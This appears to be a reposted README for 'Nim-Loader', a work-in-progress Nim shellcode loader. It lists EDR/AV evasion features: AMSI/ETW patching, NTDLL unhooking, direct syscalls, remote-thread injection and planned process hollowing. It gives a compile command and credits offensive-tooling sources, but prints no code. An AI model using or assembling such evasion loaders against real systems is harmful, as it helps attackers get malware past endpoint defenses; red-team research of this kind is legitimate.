Nim-Loader - WIP Shellcode Loader In Nim With EDR Evasion Techniques

a very rough work-in-progress adventure into learning nim by cobbling resources together to create a shellcode loader that implements common EDR/AV evasion techniques. This is a mess and is for research purposes only! Please don't expect it to compile and run without your own modifications. Instructions Replace the byte array in loader.nim with your own x64 shellcode Compile the EXE and run it: nim c -d:danger -d:strip --opt:size "loader.nim" Probably adjust which process you want to inject into by looking in the .nim files of the injection folder method you're using... Completed Features Direct syscalls dynamically resolved from NTDLL (Thanks @ShitSecure) AMSI and ETW patching (Thanks @byt3bl33d3r) NTDLL unhooking (Thanks @MrUn1k0d3r) CreateRemoteThread injection (Thanks @byt3bl33d3r, @ShitSecure) WIP Features Process Hollowing Technique (Thanks @snovvcrash) Shellcode encryption/decryption using [AES in CTR mode](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Counter_(CTR) (Thanks @snovvcrash) Replace all compatible API calls with syscalls Add template generator and compiler, cmdline args for shellcode, injection methods, process paths, etc. Obfuscation Consider using denim by @LittleJoeTables for obfuscator-llvm nim compilation support! References & Inspiration OffensiveNim by Marcello Salvati (@byt3bl33d3r) NimlineWhispers2 by Alfie Champion (@ajpc500) SysWhispers3 by klezVirus (@KlezVirus) NimPackt-v1 by Cas van Cooten (@chvancooten) unhook_bof.c by Mr. Un1k0d3r (@MrUn1k0d3r) NimGetSyscallStub by S3cur3Th1sSh1t (@ShitSecure) NimHollow by snovvcrash (@snovvcrash) Examples Download Nim-Loader

Nim-Loader - WIP Shellcode Loader In Nim With EDR Evasion Techniques


a very rough work-in-progress adventure into learning nim by cobbling resources together to create a shellcode loader that implements common EDR/AV evasion techniques.

This is a mess and is for research purposes only! Please don't expect it to compile and run without your own modifications.


Instructions

  • Replace the byte array in loader.nim with your own x64 shellcode
  • Compile the EXE and run it: nim c -d:danger -d:strip --opt:size "loader.nim"
  • Probably adjust which process you want to inject into by looking in the .nim files of the injection folder method you're using...

Completed Features

  • Direct syscalls dynamically resolved from NTDLL (Thanks @ShitSecure)
  • AMSI and ETW patching (Thanks @byt3bl33d3r)
  • NTDLL unhooking (Thanks @MrUn1k0d3r)
  • CreateRemoteThread injection (Thanks @byt3bl33d3r, @ShitSecure)

WIP Features

Obfuscation

  • Consider using denim by @LittleJoeTables for obfuscator-llvm nim compilation support!

References & Inspiration

  • OffensiveNim by Marcello Salvati (@byt3bl33d3r)
  • NimlineWhispers2 by Alfie Champion (@ajpc500)
  • SysWhispers3 by klezVirus (@KlezVirus)
  • NimPackt-v1 by Cas van Cooten (@chvancooten)
  • unhook_bof.c by Mr. Un1k0d3r (@MrUn1k0d3r)
  • NimGetSyscallStub by S3cur3Th1sSh1t (@ShitSecure)
  • NimHollow by snovvcrash (@snovvcrash)

Examples